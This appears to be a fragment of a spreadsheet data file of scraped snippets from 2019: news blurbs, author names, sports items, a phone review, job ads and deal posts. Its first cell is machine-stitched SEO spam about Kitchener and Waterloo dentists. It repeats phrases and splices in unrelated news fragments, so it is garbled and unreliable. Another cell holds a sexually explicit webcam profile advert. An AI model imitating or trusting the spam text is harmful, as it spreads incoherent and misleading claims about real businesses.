care in Waterloo. Book online with our dentist near you. Visit our dental clinic near you. Feel relaxed when you visit our dental office. 95% of our patients say they'd recommend us to friends. Get started today! Reserve an appointment online now. Dentist, cosmetic dentist, dental clinic, emergency. Dr. Hurlbut, Dr. De Miglio and their Kitchener dental team know and. At our Kitchener clinic, we offer complete dental care services that will make sure that your teeth remain strong and in good condition. Find Cosmetic Dentistry near you Companies having. web (15) email (14) verified listing (2) opening. Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In. Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In. When a patient is looking for dental clinics on the internet, they enter some keywords such as ‘dental clinics in Colorado’ or ‘cosmetic dental services. When a patient searches for dental clinics. New Falls public health site to offer more services under one roof – She said public health’s Niagara Falls division has been unable to provide many services out of the Kitchener Street building. Best Dental Clinic In Kitchener Ontario Kitchener, Ontario 630 Dentists near you Go StarOfService Ontario Kitchener Dentists Hire the best Dentists in Kitchener. Danube Dental Clinic Dentist N2A 0A1 Kitchener (Show more) (Show less) Show more. . We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral de. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Dental Specialties in Kitchener &amp; Waterloo, Ontario – We offer dental services such as emergency dentistry, general dentistry, cosmetic dentistry, Best Dentist In Kitchener Ontario Preferred Dentist Near Kitchener Ontario Let us help you find the perfect dentist Go Best of 2019 – Dentists in Kitchener, ON Best of 2019 – Dentists in Kitchener, ON Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have receiv. Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question – Canada’s prostitution laws are being questioned at a landmark case in Kitchener. Closing. Kid Friendly Dentist In Kitchener Entrepreneurship is second nature for Brodie, who, at 28, is CEO and co-founder of Kitchener, Ont.-based Bridgit. Brodie. Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. Looking for a dentist in Waterloo? Waterloo Smiles – best dental care clinic serving family, Cosmetic and Pediatric Dentistry in Waterloo-Kitchener, ON. Book an Appointment; call. Emergency Dentistry services in Kitchener, Ontario. We offer emergency walk-ins and same day appointments. Kid-friendly family dentist Direct electronic billing to your insurance Open evenings and weekends Zero interest payment plans. Why affordability matters in 2019 campaign – No wonder, then, that the Liberals, Conservatives and New Democrats all spent the campaign’s first week making pitches focused squarely on that family-friendly demographic, said Leger vice-president. Topic, who’s also without children of her own and has three dogs. in the Shape DTK 2020 report that was compiled in. Wow!!! If you want to choose from a variety of unique frames then this is your place! All the staff that I dealt with were positive energy, friendly people who seem to. Top 3 reasons I hate going to the dentist: 3. Dentist never takes time to. Root Canal Therapy in Kitchener can help you fix an infected tooth and inflamed tooth pulp.; ?&gt; CALL NOW 1-519-893-2790. Kid-friendly family dentist Open evenings and weekends Direct electronic billing to your insurance Zero interest. The family’s four children were playing outside. she would have been an easy target. “She is very friendly,” says mother. You’d be surprised to find how welcoming most family friendly dentists really are. Through the appointment you’ll have the ability to experience what dentists and the staff are like and the. Highest Rated Dentist Near Kitchener Ontario Highest rated Most reviewed Alphabetical Recently Reviewed Filters Locations Pick the area(s) you’d like to see results in. Ayr, ON Baden, ON Bamberg, ON. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut? Menu. best of all – complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Kitchener. We’re the original doctor ratings site with over 2 million reviews. Highest Rated Most Reviewed Distance Bird's-eye View Driving (8 km.) Biking (4 km.) Walking (2 km.) Within 4 blocks Price $ $$ $$$ $$$$ Features. Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit Top Dental Clinic In Kitchener Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. DR. KYLE HORNBY, DDS 77 Water St N, Kitchener, ON N2H 5A6 Since 1970 DANUBE DENTAL CL. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut?. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Preferred Dental Clinic Near Kitchener Ontario Preferred Dental Clinic In Kitchener Ontario Best Dentist -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2018/12/31/preferred-dental-clinic-in-kitchener-ontario-6. . Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We. Best Dentist In Kitchener Number 1 Dental Clinic In Kitchener Ontario The health centre has nearly doubled its number of medical exam. registered practical nurse and clinic assistants serve. Best Dentist In Kitchener Find the best Dentist in Kitchener, ON. Discover Dentists real customer reviews and contact details, including hours of operation, the address and the phone number of the local. But she rounded on Singh over a promise for universal dental coverage in addition to drug coverage. "What I support is the. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut. complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about visiting the dentist, The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Cosmetic Dentist Near Kitchener Ontario As you consider a dentist in Kitchener, ON, take some time ...</t>
  </si>
  <si>
    <t>Mark</t>
  </si>
  <si>
    <t>The CRTA says the appointments will help raise standards The post Regtech association names new board members appeared first on Advisor.</t>
  </si>
  <si>
    <t>Blake Lough</t>
  </si>
  <si>
    <t>It is unclear how many oversized classrooms there are in Calgary this school year – the CBE said it does not have data on class sizes available this school year.</t>
  </si>
  <si>
    <t>The PGA Tour players elected Rory McIlroy as the 2018-19 Player of the Year on Wednesday. This is what to expect on the Tour in 2019-20. Source: Sports Business News</t>
  </si>
  <si>
    <t>Welcome to the Vaughan Community Health Centre The Vaughan Community Health Centre is a not-for-profit, community-governed organization that provides clinical and social services with a primary focus on residents of Western and Northern York. Dentist in Woodbridge Ontario. 8280 Highway 27 Vaughan ON,L4H 0R9. For more information please contact us at (905) 856-9966 Missisauga Dental Clinic (905) 785-3439 Vaughan / Woodbridge Dental Clinic (905) 856-9966 Book an Appointment. . Cosmetic Dentist In Vaughan Ontario Sunny Day Dental features an outstanding staff waiting to fulfill all your dental needs. Contact our Woodbridge office to learn more. Chopra was recently featured in the Ontario Dentist journal for his work with implants and implant. England’s chief dental officer, Sara Hurley, has now seen the report, and confirmed that extra cash would be Mackenzie Dental Centre – 5-3450 Major Mackenzie Drive West, Vaughan, Ontario L4H 4J5 – Rated 5 based on 3 Reviews "Excellent Dentist. Very nice staff as. . Sleep apnea causes patients to stop breathing for several seconds or minutes in. Impressions Dental, in Vaughan, ON, is a modern clinic of Family and Cosmetic Dentistry. This Vaughan dental care clinic offers exceptional procedures, including veneers, dental implants, sedation, endodontics, orthodontics, .</t>
  </si>
  <si>
    <t>Some artists only have one really big hit. [The YouTube] What’s been on your mind? Got something you’d like to share? A topic to discuss? It’s Wednesday Night Open Thread. Who wants to start? 0 0</t>
  </si>
  <si>
    <t>Senate crossbencher Jacqui Lambie has revealed she cooked union boss John Setka a roast lamb to try and convince him to quit.</t>
  </si>
  <si>
    <t>GREECE is being hit by strikes and protests this week, forcing the UK Foreign and Commonwealth Office to issue a travel warning to Britons heading to the popular holiday destination. This is what you need to know. Daily Express :: Travel Feed</t>
  </si>
  <si>
    <t>The previews are in from ITV for next week’s Coronation Street and Gary attacks Ryan. Ryan gets a...</t>
  </si>
  <si>
    <t>Rob Manfred wants a more predictable and consistent baseball. A report shortly after the 2019 World Series could determine whether that happens for the 2020 season, Source: Sports Business News</t>
  </si>
  <si>
    <t>Michael Gleeson</t>
  </si>
  <si>
    <t>Big-game Tiger hates letting his teammates down and a poor final last year when injured may make him even more dangerous than usual.</t>
  </si>
  <si>
    <t>Linda Bukowski</t>
  </si>
  <si>
    <t>Hey Ozbargain Community, We offer you the most updated discounts on our new Website! Colour: White Size: 45*137cm Salt: 50mm 50mm Embossed (timber grain look) slat, white, PVC (foam wood) studio Venetian blinds. Suitable for inside and outside frame mounting. Provides flexible light control and privacy. Ideal for high moisture areas. Available in 28 sizes.</t>
  </si>
  <si>
    <t>Share0 Currently, bitcoin has occupied the maximum part of the cryptocurrency market since its record price level of $ 20,000 in 2017. Analysts believe this is the beginning of the end of the altcoin market. According to CoinMarketCap, as of September 3, bitcoin accounts for 70.5% of the total cryptocurrency market capitalization. This figure has not been observed since March 2017 and it is believed that Bitcoin gained strength due to altcoins. The uncertainty with altcoins has already caused criticism from both traders and analysts. Among them are Peter Brandt and Max Kaiser, who again stated that altcoins will never recover from the current fall. “Altcoins will never recover. Sorry, ”he tweeted, also taking into account market capitalization statistics. Brandt repeated similar warnings. “When will altcoin addicts understand that bitcoin is a cryptocurrency with real value? Compared to bitcoin, altcoins are like lead compared to gold, ”Brandt wrote. Some commentators have expressed caution regarding the power of bitcoin. According to them, market capitalization is a poor indicator of efficiency, since it includes data from many altcoins that do not even have a trading turnover. . Share0</t>
  </si>
  <si>
    <t>It has been 14 years since Bec Hewitt officially stepped away from acting in to focus on raising her three children. But the former Home And Away star, 36, is said to be planning a triumphant return to screens, starring in Ten’s long-running soap opera Neighbours. ‘Now that Lleyton has retired from tennis, Bec feels that it’s her time to focus on her career,’ an insider told New Idea on Monday. From Summer Bay to Ramsay Street! Bec Hewitt, 36, is reportedly in talks to join the cast of Neighbours – fourteen years after leaving Home And Away The source claimed that Bec’s recent stint working for Nine’s travel series Helloworld reinvigorated her desire to work in front of the camera. ‘She felt right back at home,’ the source said. If Bec does debut on Ramsay Street, she won’t have to travel far for work- Neighbours is filmed just a few suburbs away from her $12.7million mansion in Melbourne’s Toorak. Blast from the past! Bec (right) portrayed Hayley Smith/Lawson on Channel Seven’s soap Home And Away from 1998 to 2006 Last year, the mother-of-three gave a candid interview about her departure from the spotlight in 2006, telling Stellar magazine that it just ‘naturally happened’. ‘It was never a choice – a decision – that I made [to quit acting]. It just naturally happened because, obviously, I wanted to be there with the kids. I don’t want to miss anything,’ she explained. In recent years, however, Bec has been creeping back into the public eye, taking on a ambassador roles for Barbie and Hans Continental in 2016. Family life: It has been 14 years since the former popstar officially stepped away from acting in to focus on raising her three children Mia, 13, Cruz, 10, and Ava, 8. Pictured with Bec’s husband Lleyton ‘She felt right back at home’: The source claimed that Bec’s recent stint working for Nine’s travel series Helloworld reinvigorated her desire to work in front of the camera Speaking to the Sydney Morning Herald at the time, Bec said she was nervous about returning to the spotlight. ‘I’m settled now, the kids are all in school but I’m really nervous. It’s been so many years since I’ve done talk shows and press,’ she said in November 2016. After nabbing her Helloworld presenting gig in 2018, Bec told The Daily Telegraph that she felt ready for a career reboot. ‘I think it’s the right time and the right job just to fit in with my other job of being a mum,’ she said. Bec and her tennis champion husband Lleyton tied the knot at the Sydney Opera House in 2005, and share children Mia, 13, Cruz, 10, and Ava, 8. Famous family! Bec and her tennis champion husband Lleyton (pictured together) tied the knot at the Sydney Opera House in 2005</t>
  </si>
  <si>
    <t>Souths' last-round defeat of the Roosters shows they are more adaptable this year, after being outsmarted by the Roosters in the 2018 preliminary final.</t>
  </si>
  <si>
    <t>YUKLASH Ilovasi: https://itunes.apple.com/fr/app/local-traveller/id1199035677?l=en&amp;mt=8 va https://play.google.com/store/apps/details?id=com.penceo.localtraveller F&amp;B ATLANTA – AQSh, ATLANTA Home "Bistro" romantik kvartirasi xira yoritilgan sharoitda frantsuz taomlari va […] The post F&amp;B ATLANTA – AQSh, ATLANTA appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Asian-Australians make up 12 per cent of the population but hold only 3 per cent of senior leadership positions in public institutions and ASX 200 companies.</t>
  </si>
  <si>
    <t>Ciaran Shanks</t>
  </si>
  <si>
    <t>A woman was admonished after admitting to stealing from Dundee’s Ann Summers store.</t>
  </si>
  <si>
    <t>Hurricane Dorian's winds slowed, prompting a downgrade to a still-powerful Category 4, as it parked over Grand Bahama Island, stirring up winds and storm surges 18 to 23 feet above normal levels.</t>
  </si>
  <si>
    <t>Maddie</t>
  </si>
  <si>
    <t>Included on 2016’s Forbes 30 Under 30 Asia List, Vinesh Johny is the co-founder of India’s first global specialized baking academy. More Great Deals... More Great Deals...</t>
  </si>
  <si>
    <t>Matt Bamford</t>
  </si>
  <si>
    <t>Champion Kimberley rodeo rider Kadin Bauer lost his brother and some of his uncles and aunties to suicide. Now he is part of a program using horses to help lower the suicide rate in his area.</t>
  </si>
  <si>
    <t>Nicole Lindsay</t>
  </si>
  <si>
    <t>David Hodgson’s Hodgson Partners has paid a record price for a strata office on Exhibition Street.</t>
  </si>
  <si>
    <t>Katie Scott</t>
  </si>
  <si>
    <t>The Albuquerque, N.M., math teacher won his 17th consecutive game on Monday, bringing his total winnings to $472,096 so far.</t>
  </si>
  <si>
    <t>Sarah Berry</t>
  </si>
  <si>
    <t>Lisa Curry could “unwittingly devastate the lives of women” in her efforts to raise awareness for hormone imbalance while promoting her supplement line.</t>
  </si>
  <si>
    <t>The mysterious Westcoast Goddess comes through with some retro-fitted house music. Out September 20. Get your copy: https://es.juno.co.uk/products/westcoast-goddess-soul-out-of-time-ep/745465-01/ Slam City Jams is back with its sixth release and welcomes a new face to the label: the mysterious producer, Westcoast Goddess, with his 'Soul Out Of Time' EP. After releases on Shanti Celeste’s Peach Discs (under […] The post JUST IN: Westcoast Goddess – Open Heart [Slam City Jams] appeared first on Dubster.</t>
  </si>
  <si>
    <t>Richard Zussman</t>
  </si>
  <si>
    <t>You know Premier John Horgan. Now meet Victoria Shamrocks fan John Horgan.</t>
  </si>
  <si>
    <t>Wayne Carey</t>
  </si>
  <si>
    <t>Chris Scott's public messaging in defence of Geelong's recent slump risks treating the club's supporters as fools.</t>
  </si>
  <si>
    <t>xXx RETURN OF XANDER CAGE was a huge success – and once the fourth instalment is up and running it will no doubt be the same. Daily Express :: Films Feed</t>
  </si>
  <si>
    <t>Accusations being exchanged between Donald Trump and Joe Biden have elevated the President's dealings with Ukraine into a potentially significant new issue in the presidential race.</t>
  </si>
  <si>
    <t>Laura OLeary</t>
  </si>
  <si>
    <t>Sam Allardyce shielded Newcastle United manager Steve Bruce from blame after the 5-0 loss to Leicester City on Sunday. The former Magpies boss highlighted how Jamaal Lascelles should have done better when trying to stop Ricardo Pereira opening the scoring, and that those sort of mistakes by players cannot be put on Bruce. “The mistakes cannot be pointed out or given as the manager’. Source</t>
  </si>
  <si>
    <t>We are currently looking for a Team Assistant to support a globally recognized accounting firm in Downtown Montreal. If hired you will work full-time hours on a 6 months assignment (with the possibility of perm), be paid $27.27 per hour. Responsibilities: ● Monitor Google calendar. This includes responsibility for arranging internal and external meetings, responding .. Read more</t>
  </si>
  <si>
    <t>There are nine races scheduled today for Sydney's home of racing</t>
  </si>
  <si>
    <t>microwapp</t>
  </si>
  <si>
    <t>MSY is running 10% OFF storewide after discount, AMD Ryzen 9 3900X 4.6Ghz $728 AMD Ryzen 5 3600 $288 CORE i7-9700K $530 CORE i7-9700KF $503 This is the best price I saw for a local computer shop In store purchase only</t>
  </si>
  <si>
    <t>Red Hat Security Advisory 2019-2792-01 – Red Hat OpenShift Container Platform is Red Hat’s cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the openshift-enterprise-container container image for Red Hat OpenShift Container Platform 4.1.16. Issues addressed include a cross site request forgery vulnerability. Published at: September 17, 2019 at 09:58PM View on Packet Storm The post Red Hat Security Advisory 2019-2792-01 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Howard Tsumura</t>
  </si>
  <si>
    <t>LANGLEY — There’s a sense deja vu filtering through the airwaves this week around the province of B.C. with return of Varsity Letters-The Podcast. Long a weekly staple during my years at The Vancouver Province, we’re back for the first time since 2016, right here at our new home at VarsityLetters.ca This week, we’re honoured […]</t>
  </si>
  <si>
    <t>wbeeball</t>
  </si>
  <si>
    <t>Basketball England is unveiling a new plan to boost participation in women’s basketball as the new WBBL season starts this weekend. The aim is to …</t>
  </si>
  <si>
    <t>Source: https://www.cnet.com/news/elon-musk-says-spacex-starship-could-get-to-orbit-within-six-months/#ftag=CAD590a51e Elon Musk says SpaceX Starship could get to orbit within six months – CNET “I think we should do our very best to become a multi-planet species and we should do it now.” Source: https://www.cnet.com/news/elon-musk-says-spacex-starship-could-get-to-orbit-within-six-months/#ftag=CAD590a51e The post Elon Musk says SpaceX Starship could get to orbit within six months – CNET appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Follow along with Week 15 action between the Hamilton Tiger-Cats and Edmonton Eskimos.</t>
  </si>
  <si>
    <t>Jessica Haynes And Daniel Keane</t>
  </si>
  <si>
    <t>The high-profile host of SBS show Living Black says she was racially profiled by police in the Northern Territory, saying she was treated like a "grog runner" when she entered an Alice Springs bottle shop.</t>
  </si>
  <si>
    <t>A sleek 57-footer with self-tacking headsail and easy docking system. It boasts a dinghy garage and a large opening swimming platform at the aft. The double tables at the cockpit can convert to a large sunbathing area. Click to find best Hanse charter yacht and to get the best deals: http://www.hanseyachtselection.com ©HanseYachts AG source The post Charter Sailing Yacht Hanse 575 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>"Stab City" by L.U.X is OUT NOW on Black Label! Stream / Buy ➤ http://NSD.lnk.to/NSDBLS016 Want more? Check out all our releases on Spotify ➤ http://nsdx.uk/NSDBLSpotify —————————————— Never Say Die Playlists ➤ NSD Weekly - http://nsdx.uk/NSD-Weekly NSD New Music - http://nsdx.uk/NSD-NewMusic NSD Mixes - http://nsdx.uk/NSD-Mixes NSD Top Hits - http://nsdx.uk/NSD-TopHits NSD Dubstep Selections - http://nsdx.uk/NSD-DubstepSelect […] The post L.U.X – Stab City appeared first on Dubster.</t>
  </si>
  <si>
    <t>EXCLUSIVE: Seven’s Head of Sport Saul Shtein will depart the network after 15 years, following the AFL Grand Final next week. “We’re very grateful for all his service over the last 15 years with the network,” a Seven spokesperson told TV Tonight. “An announcement in regards to his replacement will be made in due course.” Sources suggest his shock redundancy is one of several announcements to be made by newly-installed CEO James Warburton and comes despite AFL performing well for the network in a challenging ratings year. Shtein has an impressive CV across some 40 years the industry, enjoying 17 years with Nine before 9 years at FOX Sports. During his term at Seven he has overseen key events including AFL, multiple Olympics, Melbourne Cup and Australian Open events plus golf, rugby world cup, motor racing, yachting and more recently with Big Bash Cricket. During that time, broadcasting of Live events has undergone major technological and audience change, whilst Sports rights have increased dramatically. “It’s a completely new world.,” he told TV Tonight in 2016. “In Athens we had basically the one channel to air,” he said. “So if events were occurring concurrently you would have to do one Live and replay the others. “For Rio we will be Live with all three channels concurrently, plus we are Streaming up to 36 Live feeds, there’s Catch-up, and you can watch it on any device. You can see the coverage whether you’re out and about or in the office, on your PC, laptop, phone, iPad or tablet. “It’s a completely new ball game.” His departure comes ahead of Seven’s Cricket season and the Tokyo Olympics next July.</t>
  </si>
  <si>
    <t>Scott Morrison would have prepared for many scenarios in the lead-up to his historic one-on-one Oval Office meeting with Donald Trump. But he couldn't have seen this coming.</t>
  </si>
  <si>
    <t>Iceland Trip 2019 The post Iceland Trip 2019 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>My Kinks: My only fetish is to please you in all your reques Webcam profile: Showing my gorgeous body is my favourite occupation Favourite sex position: Rider What I do in my amateur show: The only thing that makes me horny is a real alive person in my chat room. Be yourself – and I ‘ll be yours. What I don’t like: I love all Gallery</t>
  </si>
  <si>
    <t>Natalie Hamilton</t>
  </si>
  <si>
    <t>The summer isn’t over yet and Willows Estate residents recently got a taste of one of the season’s signature foods.</t>
  </si>
  <si>
    <t>Police Scotland are appealing for information after two large bricks were thrown through the window of a Dundee flat, almost hitting the occupants.</t>
  </si>
  <si>
    <t>tony allan tony allan posted a photo: The park, Hastings. Recent Uploads tagged park</t>
  </si>
  <si>
    <t>Lionel Messi and Megan Rapinoe are announced as the Best Men’s and Women’s Players at FIFA FIFPro ceremony in Milan. There were lots of other awards as well. Source: Sports Business News</t>
  </si>
  <si>
    <t>9erence</t>
  </si>
  <si>
    <t>Uniqlo Is Giving Away Freebies This Thursday at Its New Hurstville Store The Japanese retail giant is celebrating the opening of its seventh outpost in NSW. The first 250 customers through the door will score a free Donut Papi doughnut, and the first 500 shoppers to spend more than $100 in a single transaction will snap up a goodie bag as well.</t>
  </si>
  <si>
    <t>Daniel Keane</t>
  </si>
  <si>
    <t>Dashcam footage shows an out-of-control truck hurtling through a red light at the base of Adelaide's South Eastern Freeway, moments after the vehicle lost its brakes and was forced onto the wrong side of the road.</t>
  </si>
  <si>
    <t>Los Angeles Can Add Key Pieces To NBA Title Aspirations Original Source On paper, the Los Angeles Lakers look formidable. The injury to DeMarcus Cousins is seen as a big loss but they did fill up that hole with the signing of Dwight Howard. But then again, there is no telling if the 6-foot-11 can recall the old form that made him a three-time NBA Defensive Player of the Year. In short, anything can happen this 2019-20 NBA season. The Lakers could live up to their billing as one of this year’s favorites or flounder. Should they need more manpower heading into the playoffs (assuming they do reach it this far), they now have another chip they can use – a disabled player exception. Sources told Shams Charania of The Athletic that the Lakers were granted a disabled player exception worth $1.75 million by the NBA for the expected season-ending ACL injury to DeMarcus Cousins. It expires on March 10, 2020. This means that the Lakers could add a player who would be willing to play for $1.75 million. Seeing how good the chances the purple and gold hold in possibly winning it all, there are a lot of players who are expected to be open to the idea. But this still depends on what the Lakers plan to do with Cousins. As of this writing, Cousins remains a Laker and the only way a roster spot can open is if the 29-year-old center is waived. Boogie is on a one-year deal with the Lakers and unless he can show he can play at some point, chances are he will be waived to make room for someone who can help the Lakers 2019-20 campaign. Aside from the injury, Cousins is also facing domestic violence charges. In a previous post, it was detailed how the newly-married NBA star threatened his former girlfriend, Christy West, for now allowing their son to attend his wedding. Cousins married long-time flame Morgan Lang before the domestic violent row cropped up. Also factoring in is Howard. If the eight-time NBA All-Star can respond well in the company of LeBron James and Anthony Davis, the Lakers would more likely be inclined to waive him and skim the market for players who can be of help. Right now, it appears the purple and gold could benefit more adding players to any position on the squad. DeMarcus Cousins suffered a foot injury during the Warriors’ win over Thunder on Saturday. In this picture, Cousins #0 of the Golden State Warriors during their game against the Charlotte Hornets at Spectrum Center in Charlotte, North Carolina, Feb. 25, 2019. Photo: Streeter Lecka/Getty Images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Los Angeles Can Add Key Pieces To NBA Title Aspirations appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>He’s the shrewd political mastermind credited as the brains behind Donald Trump’s meteoric rise to power. But an explosive new documentary suggests we got this man all wrong.</t>
  </si>
  <si>
    <t>England brush aside a determined United States side as Eagles' flanker John Quill becomes the first player to be sent off at the RWC.</t>
  </si>
  <si>
    <t>Sept. 13, 2019 Iran’s Properties in Canada Sold, Proceeds Handed to Terror Victims – Stewart Bell (Global News-Canada) Tens of millions of dollars’ worth of seized Iranian government properties have been sold off in Canada and the proceeds handed to victims of Hamas and Hizbullah – terrorist groups bankrolled, armed and trained by Iran. According to a document filed in the Ontario Superior Court of Justice last month, the victims got a share of the $28 million earned through the sale of Iran’s buildings in Ottawa and Toronto.</t>
  </si>
  <si>
    <t>Protesters in Hong Kong vandalized a subway station Sunday, smashing surveillance cameras and electronic ticket sensors, as pro-democracy demonstrations took a violent turn once again. CBC | World News</t>
  </si>
  <si>
    <t>First Impressions The Xperia 1 was a great handset, with its 21:9 screen delivering something a bit different to the competition. The Xperia 5 is more of the same, although this time around the screen is a smaller, a more manageable 6.1-inch model. Maintaining the same range of features that the Xperia 5’s big brother had but at a cheaper price, this is arguably the more interesting phone. There was a lot to like about the Sony Xperia 1, with the company taking a different approach with its 21:9 4K screen and using three cameras for the ultimate flexibility. That 6.5-inch screen and wide aspect ratio made it a bit of a lump to hold, which will make the altogether more compact Sony Xperia 5 a more interesting phone to most people. We got to go hands-on with the phone at IFA 2019 to see what this compact phone is all about. Sony Xperia 5 – Design and screen From the outside that Xperia 5 is effectively a smaller version of the Xperia 1. This model retains the original’s 21:9 aspect ratio, but has a smaller 6.1-inch screen. That may not sound particularly small, but the Xperia 5 measures a more svelte 158 x 68 x 8.2mm. While it’s still quite a tall phone, the reduced width makes this model that bit easier to hold than the Xperia 5. Sony has dropped the 4K display, opting for a 2520 x 1080 screen instead. That still looked plenty sharp to our eyes, although there’s still the potential for problems with many apps and content not designed for this screen resolution. Sony has made some progress on this front, promising Fortnite in full-screen glory. Related: Best phone Although there’s a lower resolution OLED display here than on the flagship model, the Xperia 5’s display is still HDR compatible. There’s a similar feel to this handset as its big brother and the more plastic body doesn’t have the same premium feel as, say, the iPhone XS or Galaxy S10. Going by the Xperia 1, the new model should be robust, with its body less likely to pick up scuffs. The display has Gorilla Glass 6 for extra toughness. Sony quotes the phone as having an IP65/68 rating, which means that it’s sealed against dust and should be shower and dunk proof. The small print does warn that you shouldn’t “put the device completely underwater, or expose it to seawater, salt water, chlorinated water, or liquids such as drinks” and that the “USB port must be completely dry before charging”. The right side of the phone is button central, with shutter, volume rocker, lock switch, and fingerprint reader. We didn’t get a chance to test the fingerprint reader but if it’s as good as the one on the Xperia 1, it should be lightning fast. Sony Xperia 5 – Gaming As well as giving you Fortnite formatted to fit the 21:9 screen, the Sony Xperia 5 is also compatible with the PlayStation 4’s DualShock 4 controller for proper control. There’s even an optional clip that sits over the top of the controller to hold the phone in place. Given how loved this game controller is, it should give the Xperia 5 a lift over the competition, such as the Asus ROG Phone 2. DualShock 4 support is also coming to the Xperia 1. There’s also the Game Enhancer, which lets you burst capture your games at 20fps and use the voice changer feature to make yourself sound different. Related: PS5: All the latest news, info and specs for Sony’s PlayStation 5 Sony Xperia 5 – Cameras It’s impossible to miss the three cameras on the rear, which match those on the Xperia 1. Designed to offer the maximum flexibility, all three cameras have the same 12-megapixel resolution but operate at different focal lengths, with an f/1.6 26mm main camera, f/2.4 52mm zoom and f/2.4 16mm wide-angle. We didn’t get a chance to put the camera through its paces, although we expect the results to be similar to those of the Xperia 1: that is, the best camera that Sony has put into a phone, but a touch behind the Google Pixel 3. There’s also an 8-megapixel front snapper. Sony Xperia 5 – Power There are no surprises for guessing what’s inside, with the Xperia 5 using the same Qualcomm 855 chipset as the Xperia 1. There’s also the same 6GB of RAM and 128GB of storage, which can be upgraded via the microSD card slot that can take cards of up to 512GB. Using the 855 chipset means that this phone doesn’t support the growing number of 5G networks and you’re limited to 4G LTE connections. There’s a slightly smaller 3,140mAh battery (the Xperia 1 has a 3,330mAh battery) charged via the phone’s USB-C port that supports PD fast charging. The smaller battery won’t make much of a difference as there’s a smaller, lower-resolution screen to power. In fact, we’d hope that the Xperia 5 would last longer on a charge, as the Xperia 1 was a little disappointing. We’ll have to wait until we have a review sample to find out how good (or not) this new phone is. Sony Xperia 5 – Price and release date The Sony Xperia 5 will go on sale in the UK on Friday 4 October, with pre-orders starting on Wednesday 18 September 2019. Europe pricing is set at €799, which works out at around £715, although official UK pricing has yet to be released. With that kind of pricing, the Xperia 5 should be around £130 cheaper than its big brother. Sony Xperia 5 – Early verdict Given that the Xperia 5 shares many of the features with its big brother, the Xperia 1, we already have a fairly good idea how it will turn out. With its super-wide screen and smaller body, the Xperia 5 feels like it pulls off Sony’s radical design in a more comfortable way. Sure, there’s a lower-resolution screen, although the new model should be plenty sharp enough for most people. With the array of cameras giving flexibility, the Xperia 5 should prove to be a decent mobile camera, although the Pixel 3 will probably still outperform it. While the Xperia 1 had a lot of high-end competition, the Xperia 5’s lower price and smaller body puts it into a slightly different category and makes it, arguably, a more interesting phone. Look out for our full review to give you the full lowdown on this new handset. A ’hands on review’ is our first impression of a product only – it is not a full test and verdict. Our writer must have spent some time with the product to describe an early sense of what it’s like to use. We call these ‘hands on reviews’ to make them visible in search. However these are always unscored and don’t give recommendations. Read more about our reviews policy. Contact via Twitter Contact via LinkedIn Home Technology Editor Starting life on the consumer PC press back in 1998, David has been at the forefront of technology for the past 20 years. He has edited Computer Shopper and Expert Reviews, and once wrote a book on ho… Contact via Twitter Contact via LinkedIn Unlike other sites, we thoroughly test every product we review. We use industry standard tests in order to compare features properly. We’ll always tell you what we find. We never, ever accept money to review a product. Tell us what you think – send your emails to the Editor. Source link</t>
  </si>
  <si>
    <t>Parliament will be suspended after MPs are expected to have rejected a second snap poll call. Read more? Click here</t>
  </si>
  <si>
    <t>***pls leave detailed msg 4032782697- no emails pls*** In search of a ENERGENIC caregiver needed for a male brain injured quadrapiligic. He is full care: – Must feed him – shower -dress him -give medications -must be very patient -housekeeping -cleaning -running errands -must have reliable vehicle -speak fluent English -5yrs experience – days and .. Read more</t>
